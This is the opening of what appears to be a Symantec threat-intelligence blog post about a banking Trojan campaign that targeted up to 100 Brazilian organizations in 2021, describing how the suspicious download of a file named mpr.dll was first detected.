Up to 100 organizations in Brazil have been targeted with a banking Trojan since approximately late August 2021, with the most recent activity seen in early October.
This campaign appears to be a continuation of activity that was published about by researchers at ESET in 2020. The attackers appeared to be undeterred by exposure and Symantec, a division of Broadcom Software, has found a large number of new indicators of compromise (IOCs) relating to this latest wave of attacks.
Symantec’s Threat Hunter Team first became aware of this recent campaign when suspicious activity was spotted in a customer environment on September 30, 2021. This initial suspicious activity was detected by our Cloud Analytics technology, and further investigation found that attempts were being made to download a suspicious file named mpr.dll onto the customer’s environment. Msiexec.exe was attempting to download the file from a suspicious URL.